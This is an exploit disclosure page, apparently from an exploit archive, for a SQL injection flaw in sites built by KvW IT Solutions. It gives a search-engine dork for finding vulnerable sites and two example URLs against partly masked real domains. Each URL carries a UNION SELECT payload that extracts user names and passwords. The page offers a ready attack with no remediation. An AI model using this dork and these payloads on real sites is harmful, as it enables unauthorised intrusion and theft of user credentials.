KvW IT Solutions SQL injection vulnerability

2014.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

########################### # Exploit Title : KvW IT Solutions SQL injection vulnerability # # Exploit Author : Iran Security Team # # Discovered By : One Hacker Alone # # Home : www.IrSecTeam.org # # Dork : intext:Deze website werd ontwikkeld door KvW IT Solutions & inurl:.php?id= # # Date: 2014 January 01 # # Tested on:windows 7 # # Software Link: http://www.kvw-it.be/ # # Contact To Me: http://forum.irsecteam.org/members/one-hacker-alone/ # # Note : I am muslim hacker From Iran , ########################### # # Exmple :http://www.demXXfish.be/artikel.php?id=1064+union+select+1,group_concat(name,0x3a,password),3,4,5,6,7,8+from+users-- # # Exmple :http://www.olXXtc.be/news.php?id=139+union+select+1,group_concat(name,0x3a,password),3,4+from+users-- # # Special Tnx To : YoSeF__HaCkeR & Ir.Soldier # # ###########################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top